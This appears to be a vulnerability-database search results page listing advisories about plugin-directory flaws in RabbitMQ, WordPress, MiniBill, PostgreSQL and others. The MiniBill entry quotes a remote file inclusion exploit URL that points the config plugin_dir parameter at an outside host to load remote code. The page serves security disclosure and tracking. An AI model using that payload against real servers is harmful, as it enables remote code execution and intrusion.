
79 matches found

UbuntuCve
added 2021/05/18 1:15 p.m. · 28 views

CVE-2021-22117

RabbitMQ installers on Windows prior to version 3.8.16 do not harden plugin directory permissions, potentially allowing attackers with sufficient local filesystem permissions to add arbitrary plugins...

CVSS 7.8 · AI score 7.2 · EPSS 0.00102
Exploits 0 · References 2
CNNVD
added 2021/05/18 12:00 a.m. · 1 views

Pivotal Software RabbitMQ Code Injection Vulnerability

Pivotal Software RabbitMQ is a suite of open source message broker software from Pivotal Software, USA, that implements the Advanced Message Queuing Protocol (AMQP). A code injection vulnerability exists in RabbitMQ that stems from the RabbitMQ installer on Windows not hardening the plugin director...

CVSS 7.8 · AI score 7.6 · EPSS 0.00102
Exploits 0 · References 2
Positive Technologies
added 2021/05/10 12:00 a.m. · 2 views

PT-2021-3265 · Rabbitmq · Rabbitmq

Name of the Vulnerable Software and Affected Versions: RabbitMQ versions prior to 3.8.16 · Description: The issue is related to insufficient access control in the plugin directory of RabbitMQ installers on Windows. This could potentially allow attackers with sufficient local filesystem permissions ...

CVSS 7.8 · AI score 7.4 · EPSS 0.00102
Exploits 0 · References 7
WPVulnDB
added 2020/10/09 12:00 a.m. · 15 views

Autoptimize < 2.7.8 - Authenticated Stored XSS via File Upload

The plugin does not check for malicious files such as .html in the archive uploaded via the 'Import Settings' feature. As a result, it is possible for a high privilege user to upload a malicious file containing JavaScript code inside an archive which will execute when a victim visits index.html...

AI score 0.8 · EPSS 0.00225
Exploits 2 · Affected Software 1
OSV
added 2018/08/10 4:29 p.m. · 1 views

DEBIAN-CVE-2018-14028

In WordPress 4.9.7, plugins uploaded via the admin area are not verified as being ZIP files. This allows for PHP files to be uploaded. Once a PHP file is uploaded, the plugin extraction fails, but the PHP file remains in a predictable wp-content/uploads location, allowing for an attacker to then...

CVSS 7.2 · AI score 7.5 · EPSS 0.02449
Exploits 0 · References 1
Imperva Blog
added 2018/04/05 3:30 p.m. · 63 views

A Deep Dive into Database Attacks [Part IV]: Delivery and Execution of Malicious Executables through SQL Commands (MySQL)

In a previous post we covered different techniques for execution of SQL and OS commands through Microsoft SQL server that can be used for delivering and executing malicious payloads on the target system. In this post we’ll discuss the same topic for MySQL database. Creating an executable directly...

AI score 7.8
Exploits 0
OPENSUSE Linux
added 2017/11/17 12:07 a.m. · 62 views

Security update for MozillaFirefox (important)

MozillaFirefox was updated to 52.5.0esr boo1068101 MFSA 2017-25 - CVE-2017-7828: Fixed a use-after-free of PressShell while restyling layout - CVE-2017-7830: Cross-origin URL information leak through Resource Timing API - CVE-2017-7826: Memory safety bugs fixed in Firefox 57 and Firefox ESR 52.5 Also...

AI score 9 · EPSS 0.28905
Exploits 0 · References 2
Tenable Nessus
added 2017/11/17 12:00 a.m. · 40 views

openSUSE Security Update : MozillaFirefox (openSUSE-2017-1279)

MozillaFirefox was updated to 52.5.0esr boo1068101 MFSA 2017-25 - CVE-2017-7828: Fixed a use-after-free of PressShell while restyling layout - CVE-2017-7830: Cross-origin URL information leak through Resource Timing API - CVE-2017-7826: Memory safety bugs fixed in Firefox 57 and Firefox ESR 52.5...

CVSS 10 · AI score 7.7 · EPSS 0.28905
Exploits 0 · References 5
RedHat Linux
added 2015/04/28 6:40 p.m. · 2 views

ovirt-engine-dwh: incorrect permissions on plugin file containing passwords

It was discovered that a directory shared between the ovirt-engine-dwhd service and a plug-in used during the service's startup had incorrect permissions. A local user could use this flaw to access files in this directory, which could potentially contain sensitive information...

CVSS 2.1 · AI score 5.8 · EPSS 0.00042
Exploits 0 · References 4
Debian
added 2014/08/07 2:48 p.m. · 24 views

[DLA 20-1] munin security update

Package: munin · Version: 1.4.5-3+deb6u1 · CVE ID: CVE-2012-3512 CVE-2013-6048 CVE-2013-6359 · Christoph Biedl munin-node: more secure state file handling, introducing a new plugin state directory root, owned by uid 0. Then each plugin runs in its own UID plugin state directory, owned by that UID...

CVSS 7.2 · AI score 5.8 · EPSS 0.00719
Exploits 1
OSV
added 2014/08/07 12:00 a.m. · 25 views

DLA-20-1 munin - security update

Bulletin has no description...

CVSS 7.2 · AI score 6 · EPSS 0.00719
Exploits 1
seebug.org
added 2014/07/01 12:00 a.m. · 14 views

MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

No description provided by source. MiniBill v1.22 Beta Remote File Inclusion Vulnerability Download: http://www.ultrize.com/minibill/download/minibill-20060714.zip Found By: the master exploit: http://Target/Path/actions/ipn.php?configplugindir=http://cmd.gif?...

AI score 7.1
Exploits 0
ThreatPost
added 2014/06/03 2:09 p.m. · 8 views

WordPress All-In-One SEO Pack Vulnerabilities Patched

A web design firm has patched two privilege escalation vulnerabilities that could have led to cross-site scripting attacks in a popular WordPress plugin it manages. If left unpatched, the issue could leave potentially millions of websites vulnerable. The problem exists in old versions of the All ...

AI score 7.5
Exploits 0 · References 6
Packet Storm
added 2012/10/12 12:00 a.m. · 33 views

WordPress Abtest Directory Traversal

Affected products: Product: wordpress · Plugin name: abtest · File name: abtestadmin.php · Details: The file abtestadmin.php of the plugin abtest is vulnerable to a Directory traversal attack see...

AI score 7.4
Exploits 0
myhack58
added 2010/03/08 12:00 a.m. · 17 views

MYSQL UDF - Can't open shared library studies-vulnerability and early warning-the black bar safety net

From Ninty's blog: MySQL supports the UDF extension, so that we can call functions inside a DLL to achieve some special features. But the specific limits on UDFs differ between MySQL versions. The following is a record: I heard, only heard, and did not test it, that on MySQL 4.1 and earlier it can be all...

Exploits 0
Cvelist
added 2009/09/17 10:00 a.m. · 18 views

CVE-2009-3229

The core server component in PostgreSQL 8.4 before 8.4.1, 8.3 before 8.3.8, and 8.2 before 8.2.14 allows remote authenticated users to cause a denial of service (backend shutdown) by "re-LOAD-ing" libraries from a certain plugins directory...

AI score 5.3 · EPSS 0.01327
Exploits 0 · References 18
NVD
added 2007/07/26 1:30 a.m. · 20 views

CVE-2007-4013

Multiple unspecified vulnerabilities in (1) Net6Helper.DLL aka Net6Launcher Class 4.5.2 and earlier, (2) npCtxCAO.dll aka Citrix Endpoint Analysis Client in a Firefox plugin directory, and (3) a second npCtxCAO.dll aka CCAOControl Object before 4.5.0.0 in Citrix Access Gateway Standard Edition before...

CVSS 9.3 · AI score 6.8 · EPSS 0.01218
Exploits 0 · References 8
Cvelist
added 2006/08/31 10:00 p.m. · 16 views

CVE-2006-4489

Multiple PHP remote file inclusion vulnerabilities in MiniBill 2006-07-14 1.2.2 allow remote attackers to execute arbitrary PHP code via (1) a URL in the config[include_dir] parameter in actions/ipn.php or (2) an FTP path in the config[plugin_dir] parameter in include/initPlugins.php...

AI score 7.5 · EPSS 0.12639
Exploits 1 · References 11
0day.today
added 2006/08/29 12:00 a.m. · 25 views

MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications. MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities. MiniBill v1.22 Bet...

AI score 7.1
Exploits 0